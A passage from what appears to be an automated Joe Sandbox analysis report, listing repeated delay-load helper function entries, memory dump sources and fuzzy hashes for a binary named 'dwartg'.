                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: e01fbb334ef384be0e4690081ad33b477440f1e6fcd2ca777e65de8094249edd
                                                                                              • Instruction ID: c9213658e33f9002d51c033306f88e752b8172ee876208255bfe73b3639bb808
                                                                                              • Opcode Fuzzy Hash: e01fbb334ef384be0e4690081ad33b477440f1e6fcd2ca777e65de8094249edd
                                                                                              • Instruction Fuzzy Hash: 06B012E2699244FC314462495C0AD77010DC0C0F11B30413EFC05C00C2E88C6C480631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: f609ad6877b97d73e797af73b5ca776b6aabc6b485b1a8c1e7cc277194a59de0
                                                                                              • Instruction ID: 35eb192b1463267c653cb59e0ef77aa6c55252ff5ae61395d762545ba9ad6ff4
                                                                                              • Opcode Fuzzy Hash: f609ad6877b97d73e797af73b5ca776b6aabc6b485b1a8c1e7cc277194a59de0
                                                                                              • Instruction Fuzzy Hash: 64B012D2699144EC310461491C0AD77010DC0C1F11B30803EFC05C00C2E88CAC040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: fadb19a0798e1a2a1d0c866265711b12a727efa1c01f45be8b29f11ceaf9092b
                                                                                              • Instruction ID: 7ec039377315a6bff887bd89e0eee51f34c720f76648cc5b860bde21cd1b7a3e
                                                                                              • Opcode Fuzzy Hash: fadb19a0798e1a2a1d0c866265711b12a727efa1c01f45be8b29f11ceaf9092b
                                                                                              • Instruction Fuzzy Hash: DBB012E2698104EC310461491D0AD77010DC0C0F11730403EFC05C00C2FC8C6E050531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 691d6bde7fff1ab09308fd7e7b0099e193ff286cf371a6fdffd8586e757bcfa3
                                                                                              • Instruction ID: cd3a4aad8cfb1b1bde0813227e2940570cd3f0418b8e2f59414c1cef7fdc113a
                                                                                              • Opcode Fuzzy Hash: 691d6bde7fff1ab09308fd7e7b0099e193ff286cf371a6fdffd8586e757bcfa3
                                                                                              • Instruction Fuzzy Hash: 6FB012E2698104EC3104614A1C0AD77010DC0C0F11730403EFC05C00C2F88C6D040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: ccd5af15ae2f0f37eefbd8ef25444280ebac705cbdfba16c113343609017020f
                                                                                              • Instruction ID: 2ab8a50767dd8a0023e469e4a0ce641d66d9d6d4107e04cb057f720eca059030
                                                                                              • Opcode Fuzzy Hash: ccd5af15ae2f0f37eefbd8ef25444280ebac705cbdfba16c113343609017020f
                                                                                              • Instruction Fuzzy Hash: 28B012E2698204FC314461495C0AD77010DC0C0F11B30413EFC05C00C2F88C6D440631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                              • Instruction ID: a8aac6331a2ceea49d4ba6c71a653f235781360813f7013d39d18684b3eab226
                                                                                              • Opcode Fuzzy Hash: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                              • Instruction Fuzzy Hash: 9CB012E2698104FC310461491C0AD77010DC0C1F11730803EFC05C00C2F88CAD040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                              • Instruction ID: f102da5f107f2beb95c370f48942cf69abdc45853bd70827b87138b72a88a176
                                                                                              • Opcode Fuzzy Hash: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                              • Instruction Fuzzy Hash: F7B012D2798244FC3144624D5C0AD77010CC0C0F11730813FFC15C01C2E88C6C480631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                              • Instruction ID: e448adc2be7529ae8117fd4f26b18f8cc9155cd5f968c8b4505dc4c06c456418
                                                                                              • Opcode Fuzzy Hash: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                              • Instruction Fuzzy Hash: 38B012D2698104EC3104624D1D0AD77010CC0C0F11730803FFC05C01C2EC9C6D0D0531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073EAF9
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3To
                                                                                              • API String ID: 1269201914-245939750
                                                                                              • Opcode ID: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                              • Instruction ID: 56574086855cc050ac47dd8b611d7e8605b59798077466543eace658c0bfd77c
                                                                                              • Opcode Fuzzy Hash: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                              • Instruction Fuzzy Hash: E1B092C629A142BC310462041E06C760109C080B91720902AB800880C2988C09060431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                              • Instruction ID: 9c37b6cd09948e4b941c485dd5f0776bce596f680dd1c15a6aef064fdaf318e1
                                                                                              • Opcode Fuzzy Hash: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                              • Instruction Fuzzy Hash: 93B012E2698104EC3104A1491D0AD77018CC0C0F11B30403EFC05C00C2EC8C6D050531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                              • Instruction ID: 4bb749487c5ed41b4cf6c9ac71d5a0908d32c8e163562226e6035e5778c47619
                                                                                              • Opcode Fuzzy Hash: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                              • Instruction Fuzzy Hash: BEB012C1698240FC3204610C9C07D7F011DC0C1F16730523EF804C00C2E88C0D881531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: PDu<s
                                                                                              • API String ID: 1269201914-3369385606
                                                                                              • Opcode ID: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                              • Instruction ID: 7ac1c5184173db6c92327c83140cb239f57f6b6f11df69f9496ab30698e9e3cc
                                                                                              • Opcode Fuzzy Hash: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                              • Instruction Fuzzy Hash: 1DB012C1698140FC310421281C0AD7F011DC0C1F15B30503EFC10C04C3A88C0E480431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: Fjuns
                                                                                              • API String ID: 1269201914-22545314
                                                                                              • Opcode ID: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                              • Instruction ID: fc47bfdc9d66926e6158a2243901488ec0f965ddff179fd0717612f9164461a6
                                                                                              • Opcode Fuzzy Hash: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                              • Instruction Fuzzy Hash: 81B012C1A98200FC314461589D0BDB7015CC0C0F16730523EF804C10C2E88C0E540631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
